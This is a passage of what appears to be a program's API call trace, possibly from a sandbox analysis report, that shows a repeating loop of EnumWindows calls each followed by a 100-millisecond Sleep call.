(dwMilliseconds=0x64) [0237.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.027] Sleep (dwMilliseconds=0x64) [0237.065] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.066] Sleep (dwMilliseconds=0x64) [0237.118] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.119] Sleep (dwMilliseconds=0x64) [0237.159] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.160] Sleep (dwMilliseconds=0x64) [0237.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.190] Sleep (dwMilliseconds=0x64) [0237.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.218] Sleep (dwMilliseconds=0x64) [0237.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.255] Sleep (dwMilliseconds=0x64) [0237.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.272] Sleep (dwMilliseconds=0x64) [0237.294] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.295] Sleep (dwMilliseconds=0x64) [0237.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.332] Sleep (dwMilliseconds=0x64) [0237.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.343] Sleep (dwMilliseconds=0x64) [0237.372] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.373] Sleep (dwMilliseconds=0x64) [0237.415] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.418] Sleep (dwMilliseconds=0x64) [0237.431] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.432] Sleep (dwMilliseconds=0x64) [0237.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.462] Sleep (dwMilliseconds=0x64) [0237.557] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.559] Sleep (dwMilliseconds=0x64) [0237.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.602] Sleep (dwMilliseconds=0x64) [0237.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.637] Sleep (dwMilliseconds=0x64) [0237.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.641] Sleep (dwMilliseconds=0x64) [0237.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.681] Sleep (dwMilliseconds=0x64) [0237.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.719] Sleep (dwMilliseconds=0x64) [0237.732] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.733] Sleep (dwMilliseconds=0x64) [0237.774] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.775] Sleep (dwMilliseconds=0x64) [0237.812] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.814] Sleep (dwMilliseconds=0x64) [0237.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.830] Sleep (dwMilliseconds=0x64) [0237.851] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.853] Sleep (dwMilliseconds=0x64) [0237.893] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.894] Sleep (dwMilliseconds=0x64) [0237.920] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.921] Sleep (dwMilliseconds=0x64) [0237.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0237.938] Sleep (dwMilliseconds=0x64) [0238.027] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.028] Sleep (dwMilliseconds=0x64) [0238.069] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.070] Sleep (dwMilliseconds=0x64) [0238.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.077] Sleep (dwMilliseconds=0x64) [0238.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.116] Sleep (dwMilliseconds=0x64) [0238.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.197] Sleep (dwMilliseconds=0x64) [0238.226] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.228] Sleep (dwMilliseconds=0x64) [0238.264] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.265] Sleep (dwMilliseconds=0x64) [0238.282] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.283] Sleep (dwMilliseconds=0x64) [0238.330] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.333] Sleep (dwMilliseconds=0x64) [0238.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.380] Sleep (dwMilliseconds=0x64) [0238.420] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.421] Sleep (dwMilliseconds=0x64) [0238.461] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.462] Sleep (dwMilliseconds=0x64) [0238.501] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.503] Sleep (dwMilliseconds=0x64) [0238.541] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.542] Sleep (dwMilliseconds=0x64) [0238.589] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.591] Sleep (dwMilliseconds=0x64) [0238.596] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.597] Sleep (dwMilliseconds=0x64) [0238.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.637] Sleep (dwMilliseconds=0x64) [0238.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.674] Sleep (dwMilliseconds=0x64) [0238.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.715] Sleep (dwMilliseconds=0x64) [0238.755] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.756] Sleep (dwMilliseconds=0x64) [0238.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.810] Sleep (dwMilliseconds=0x64) [0238.851] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.852] Sleep (dwMilliseconds=0x64) [0238.888] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.889] Sleep (dwMilliseconds=0x64) [0238.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.905] Sleep (dwMilliseconds=0x64) [0238.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0238.943] Sleep (dwMilliseconds=0x64) [0238.985] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.033] Sleep (dwMilliseconds=0x64) [0239.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.068] Sleep (dwMilliseconds=0x64) [0239.072] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.073] Sleep (dwMilliseconds=0x64) [0239.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.111] Sleep (dwMilliseconds=0x64) [0239.149] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.151] Sleep (dwMilliseconds=0x64) [0239.154] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.154] Sleep (dwMilliseconds=0x64) [0239.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.260] Sleep (dwMilliseconds=0x64) [0239.307] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.309] Sleep (dwMilliseconds=0x64) [0239.321] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.322] Sleep (dwMilliseconds=0x64) [0239.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.351] Sleep (dwMilliseconds=0x64) [0239.392] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.393] Sleep (dwMilliseconds=0x64) [0239.418] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.419] Sleep (dwMilliseconds=0x64) [0239.437] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.438] Sleep (dwMilliseconds=0x64) [0239.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.477] Sleep (dwMilliseconds=0x64) [0239.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.532] Sleep (dwMilliseconds=0x64) [0239.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.571] Sleep (dwMilliseconds=0x64) [0239.614] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.615] Sleep (dwMilliseconds=0x64) [0239.617] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.618] Sleep (dwMilliseconds=0x64) [0239.655] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.656] Sleep (dwMilliseconds=0x64) [0239.694] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.695] Sleep (dwMilliseconds=0x64) [0239.698] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.699] Sleep (dwMilliseconds=0x64) [0239.737] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.738] Sleep (dwMilliseconds=0x64) [0239.791] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.793] Sleep (dwMilliseconds=0x64) [0239.799] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.800] Sleep (dwMilliseconds=0x64) [0239.804] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.838] Sleep (dwMilliseconds=0x64) [0239.879] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.881] Sleep (dwMilliseconds=0x64) [0239.905] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.906] Sleep (dwMilliseconds=0x64) [0239.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.930] Sleep (dwMilliseconds=0x64) [0239.968] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0239.971] Sleep (dwMilliseconds=0x64) [0240.029] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.030] Sleep (dwMilliseconds=0x64) [0240.039] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.041] Sleep (dwMilliseconds=0x64) [0240.073] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.075] Sleep (dwMilliseconds=0x64) [0240.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.114] Sleep (dwMilliseconds=0x64) [0240.128] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.129] Sleep (dwMilliseconds=0x64) [0240.154] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.155] Sleep (dwMilliseconds=0x64) [0240.268] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.270] Sleep (dwMilliseconds=0x64) [0240.295] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.296] Sleep (dwMilliseconds=0x64) [0240.309] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.310] Sleep (dwMilliseconds=0x64) [0240.346] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.347] Sleep (dwMilliseconds=0x64) [0240.373] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.374] Sleep (dwMilliseconds=0x64) [0240.386] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.388] Sleep (dwMilliseconds=0x64) [0240.494] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.509] Sleep (dwMilliseconds=0x64) [0240.576] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.577] Sleep (dwMilliseconds=0x64) [0240.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.588] Sleep (dwMilliseconds=0x64) [0240.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.664] Sleep (dwMilliseconds=0x64) [0240.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.679] Sleep (dwMilliseconds=0x64) [0240.706] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.707] Sleep (dwMilliseconds=0x64) [0240.743] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.744] Sleep (dwMilliseconds=0x64) [0240.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.785] Sleep (dwMilliseconds=0x64) [0240.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.803] Sleep (dwMilliseconds=0x64) [0240.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.842] Sleep (dwMilliseconds=0x64) [0240.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.893] Sleep (dwMilliseconds=0x64) [0240.904] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.906] Sleep (dwMilliseconds=0x64) [0240.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0240.946] Sleep (dwMilliseconds=0x64) [0240.997] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.000] Sleep (dwMilliseconds=0x64) [0241.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.006] Sleep (dwMilliseconds=0x64) [0241.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.047] Sleep (dwMilliseconds=0x64) [0241.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.087] Sleep (dwMilliseconds=0x64) [0241.106] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.107] Sleep (dwMilliseconds=0x64) [0241.125] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.127] Sleep (dwMilliseconds=0x64) [0241.165] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.167] Sleep (dwMilliseconds=0x64) [0241.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.249] Sleep (dwMilliseconds=0x64) [0241.263] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.265] Sleep (dwMilliseconds=0x64) [0241.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.303] Sleep (dwMilliseconds=0x64) [0241.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.332] Sleep (dwMilliseconds=0x64) [0241.343] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.346] Sleep (dwMilliseconds=0x64) [0241.401] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.402] Sleep (dwMilliseconds=0x64) [0241.423] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.425] Sleep (dwMilliseconds=0x64) [0241.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.461] Sleep (dwMilliseconds=0x64) [0241.480] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.481] Sleep (dwMilliseconds=0x64) [0241.501] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.503] Sleep (dwMilliseconds=0x64) [0241.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.544] Sleep (dwMilliseconds=0x64) [0241.579] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.580] Sleep (dwMilliseconds=0x64) [0241.585] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.587] Sleep (dwMilliseconds=0x64) [0241.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.636] Sleep (dwMilliseconds=0x64) [0241.760] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.762] Sleep (dwMilliseconds=0x64) [0241.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.781] Sleep (dwMilliseconds=0x64) [0241.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.818] Sleep (dwMilliseconds=0x64) [0241.857] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.858] Sleep (dwMilliseconds=0x64) [0241.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.893] Sleep (dwMilliseconds=0x64) [0241.906] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.908] Sleep (dwMilliseconds=0x64) [0241.945] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.947] Sleep (dwMilliseconds=0x64) [0241.986] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0241.988] Sleep (dwMilliseconds=0x64) [0242.009] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.010] Sleep (dwMilliseconds=0x64) [0242.035] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.045] Sleep (dwMilliseconds=0x64) [0242.083] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.085] Sleep (dwMilliseconds=0x64) [0242.138] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.139] Sleep (dwMilliseconds=0x64) [0242.165] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.166] Sleep (dwMilliseconds=0x64) [0242.240] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.242] Sleep (dwMilliseconds=0x64) [0242.280] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.281] Sleep (dwMilliseconds=0x64) [0242.284] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.285] Sleep (dwMilliseconds=0x64) [0242.321] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.322] Sleep (dwMilliseconds=0x64) [0242.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.358] Sleep (dwMilliseconds=0x64) [0242.360] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.361] Sleep (dwMilliseconds=0x64) [0242.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.399] Sleep (dwMilliseconds=0x64) [0242.439] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.441] Sleep (dwMilliseconds=0x64) [0242.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.458] Sleep (dwMilliseconds=0x64) [0242.490] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.492] Sleep (dwMilliseconds=0x64) [0242.528] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.529] Sleep (dwMilliseconds=0x64) [0242.555] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.557] Sleep (dwMilliseconds=0x64) [0242.569] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.570] Sleep (dwMilliseconds=0x64) [0242.608] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.610] Sleep (dwMilliseconds=0x64) [0242.644] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.645] Sleep (dwMilliseconds=0x64) [0242.653] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.654] Sleep (dwMilliseconds=0x64) [0242.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.691] Sleep (dwMilliseconds=0x64) [0242.729] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.730] Sleep (dwMilliseconds=0x64) [0242.737] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.738] Sleep (dwMilliseconds=0x64) [0242.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.789] Sleep (dwMilliseconds=0x64) [0242.830] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.832] Sleep (dwMilliseconds=0x64) [0242.850] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.852] Sleep (dwMilliseconds=0x64) [0242.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.878] Sleep (dwMilliseconds=0x64) [0242.927] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.929] Sleep (dwMilliseconds=0x64) [0242.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.967] Sleep (dwMilliseconds=0x64) [0242.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0242.970] Sleep (dwMilliseconds=0x64) [0243.007] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.008] Sleep (dwMilliseconds=0x64) [0243.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.078] Sleep (dwMilliseconds=0x64) [0243.096] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.098] Sleep (dwMilliseconds=0x64) [0243.118] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.120] Sleep (dwMilliseconds=0x64) [0243.155] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.157] Sleep (dwMilliseconds=0x64) [0243.173] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.174] Sleep (dwMilliseconds=0x64) [0243.232] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.235] Sleep (dwMilliseconds=0x64) [0243.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.279] Sleep (dwMilliseconds=0x64) [0243.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.292] Sleep (dwMilliseconds=0x64) [0243.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.319] Sleep (dwMilliseconds=0x64) [0243.374] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.375] Sleep (dwMilliseconds=0x64) [0243.387] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.388] Sleep (dwMilliseconds=0x64) [0243.418] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.421] Sleep (dwMilliseconds=0x64) [0243.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.468] Sleep (dwMilliseconds=0x64) [0243.497] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.498] Sleep (dwMilliseconds=0x64) [0243.535] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.537] Sleep (dwMilliseconds=0x64) [0243.561] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.562] Sleep (dwMilliseconds=0x64) [0243.595] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.596] Sleep (dwMilliseconds=0x64) [0243.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.641] Sleep (dwMilliseconds=0x64) [0243.675] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.676] Sleep (dwMilliseconds=0x64) [0243.682] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.684] Sleep (dwMilliseconds=0x64) [0243.721] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.723] Sleep (dwMilliseconds=0x64) [0243.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.787] Sleep (dwMilliseconds=0x64) [0243.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.796] Sleep (dwMilliseconds=0x64) [0243.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.857] Sleep (dwMilliseconds=0x64) [0243.909] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.911] Sleep (dwMilliseconds=0x64) [0243.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.924] Sleep (dwMilliseconds=0x64) [0243.962] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0243.963] Sleep (dwMilliseconds=0x64) [0244.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.006] Sleep (dwMilliseconds=0x64) [0244.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.027] Sleep (dwMilliseconds=0x64) [0244.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.112] Sleep (dwMilliseconds=0x64) [0244.153] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.155] Sleep (dwMilliseconds=0x64) [0244.188] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.189] Sleep (dwMilliseconds=0x64) [0244.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.327] Sleep (dwMilliseconds=0x64) [0244.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.368] Sleep (dwMilliseconds=0x64) [0244.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.407] Sleep (dwMilliseconds=0x64) [0244.446] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.448] Sleep (dwMilliseconds=0x64) [0244.485] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.486] Sleep (dwMilliseconds=0x64) [0244.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.489] Sleep (dwMilliseconds=0x64) [0244.523] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.524] Sleep (dwMilliseconds=0x64) [0244.559] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.560] Sleep (dwMilliseconds=0x64) [0244.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.563] Sleep (dwMilliseconds=0x64) [0244.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.600] Sleep (dwMilliseconds=0x64) [0244.628] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.629] Sleep (dwMilliseconds=0x64) [0244.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.638] Sleep (dwMilliseconds=0x64) [0244.675] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.677] Sleep (dwMilliseconds=0x64) [0244.701] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.702] Sleep (dwMilliseconds=0x64) [0244.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.716] Sleep (dwMilliseconds=0x64) [0244.759] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.761] Sleep (dwMilliseconds=0x64) [0244.789] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.790] Sleep (dwMilliseconds=0x64) [0244.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.812] Sleep (dwMilliseconds=0x64) [0244.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.849] Sleep (dwMilliseconds=0x64) [0244.861] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.862] Sleep (dwMilliseconds=0x64) [0244.890] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.892] Sleep (dwMilliseconds=0x64) [0244.930] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.931] Sleep (dwMilliseconds=0x64) [0244.954] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.957] Sleep (dwMilliseconds=0x64) [0244.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0244.974] Sleep (dwMilliseconds=0x64) [0245.046] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0245.125] Sleep (dwMilliseconds=0x64) [0245.167] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0245.169] Sleep (dwMilliseconds=0x64) [0245.310] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0245.311] Sleep (dwMilliseconds=0x64) [0245.338] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0245.339] Sleep (dwMilliseconds=0x64) [0248.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.357] Sleep (dwMilliseconds=0x64) [0248.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.439] Sleep (dwMilliseconds=0x64) [0248.488] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.490] Sleep (dwMilliseconds=0x64) [0248.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.497] Sleep (dwMilliseconds=0x64) [0248.533] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.534] Sleep (dwMilliseconds=0x64) [0248.567] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.568] Sleep (dwMilliseconds=0x64) [0248.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.574] Sleep (dwMilliseconds=0x64) [0248.610] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.611] Sleep (dwMilliseconds=0x64) [0248.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.634] Sleep (dwMilliseconds=0x64) [0248.768] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.769] Sleep (dwMilliseconds=0x64) [0248.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.772] Sleep (dwMilliseconds=0x64) [0248.807] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0248.808] Sleep (dwMilliseconds=0x64) [0248.833] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) 